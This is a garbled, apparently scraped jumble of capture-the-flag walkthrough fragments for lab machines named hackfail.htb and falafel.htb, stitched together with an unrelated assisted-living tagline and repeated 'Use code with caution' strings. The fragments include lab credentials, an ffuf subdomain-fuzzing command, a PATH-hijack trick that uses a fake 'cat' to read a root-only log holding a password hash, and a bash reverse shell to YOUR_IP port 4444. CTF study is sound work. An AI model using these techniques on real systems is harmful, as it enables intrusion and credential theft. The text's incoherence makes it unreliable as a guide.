Experience the best in Assisted Living & Memory care Services
Username: failadmin Password: n3v3r_g0nn4_g1v3_y0u_up
Open, running OpenSSH. Useful for persistent access once credentials are recovered. hackfail.htb
http://falafel.htb/uploads/0820-2132_53b3ffcfc6f710c6/payload_name Username: failadmin Password: n3v3r_g0nn4_g1v3_y0u_up Open
ffuf -w /usr/share/wordlists/dirb/common.txt -H "Host: FUZZ.hackfail.htb" -u http://hackfail.htb -fs Use code with caution. hackfail.htb
The real fail is in /root/fail_log . You can't read it. But you notice fail_trap calls cat /root/fail_log without sanitizing $PATH . You export PATH=/tmp:$PATH , create a fake cat that copies /root/fail_log . Run fail_trap — bingo. The log contains the root password hash.
Execute a standard Bash reverse shell payload through the exploited web feature: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1 Use code with caution.
If successful, this reveals a list of users on the system. Among them, you may find a user named chris .
